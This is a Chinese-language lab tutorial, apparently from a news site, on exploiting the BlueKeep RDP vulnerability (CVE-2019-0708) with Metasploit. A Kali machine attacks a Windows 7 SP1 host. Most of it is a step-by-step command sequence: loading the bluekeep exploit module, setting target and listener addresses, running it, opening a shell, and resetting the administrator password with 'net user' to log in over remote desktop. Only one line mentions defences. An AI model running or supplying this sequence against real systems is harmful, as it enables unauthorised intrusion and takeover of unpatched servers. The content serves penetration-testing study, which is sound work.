Windows 系列服務器于 2019 年 5 月 15 号,被爆出高危漏洞,該服務器漏洞利用方式是通過遠程桌面端口3389進行攻擊的。這個漏洞是今年來說危害嚴重性最大的漏洞,跟之前的永恒之藍病毒差不多。2019年9月7日晚上淩晨 1 點左右,metaspolit 官方更新了漏洞利用程序。CVE-2019-0708 漏洞是通過檢查用戶的身份認證,導緻可以繞過認證,不用任何的交互,直接通過 rdp 協議進行連接發送惡意代碼執行命令到服務器中去。如果被攻擊者利用,會導緻服務器被黑客入侵、感染病毒,像WannaCry永恒之藍一樣大規模的感染。該漏洞影響範圍較廣,Windows7 SP1、windows2003、windows2008和08 R2、windows xp 系統都會遭到攻擊。那麼如何利用該漏洞拿下目标主機呢,接下來讓我們一起學習!
二、資源裝備1.安裝好 Kali Linux 的虛拟機一台
2.Win7 SP1受害者主機一個;
3.整裝待發的小白一個。
三、滲透實戰3.1 打開Metasploit滲透框架,如下如所示。命令:msfconsole
3.2 檢索有關遠程桌面的已知漏洞,如下圖所示。
命令:search 0708
3.3 使用檢索到的關于遠程桌面的漏洞利用模塊,如下圖所示。
命令:use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
3.4 查看攻擊目标需要設置的參數,如下圖所示。
命令:show targets
3.5 設置相關攻擊參數,如下圖所示。
命令:set rhosts 192.168.0.106
set lhost 192.168.0.102
set target 4
3.6 執行漏洞攻擊模塊,如下圖所示。
命令:run
3.7 利用建立起來的會話查看受害者主機系統的相關信息,如下圖所示。
命令:sysinfo
3.8 利用建立起來的會話查看受害者主機系統的相關信息,如下圖所示。
命令:ipconfig
3.9 查看會話命令幫助信息,如下圖所示。
命令:?
3.10 進入受害者主機cmd界面并解決亂碼問題,如下圖所示。
命令:shell
chnp 65001
3.11 利用“whoami”命令查看相關信息,如下圖所示。
命令;whoami
3.12 利用cmd命令在受害者主機創建一個新用戶,如下圖所示。
命令:net user administrator 123456
3.13 利用圖形化遠程桌面登錄工具登錄受害者主機,如下圖所示。
3.14 成功利用圖形化遠程登錄工具拿下目标主機,如下圖所示。
3.15 遠程桌面漏洞防護措施,如下圖所示(關閉遠程桌面登錄服務、開啟防火牆、安裝第三方電腦管家等等)。
更多精彩资讯请关注tft每日頭條,我们将持续为您更新最新资讯!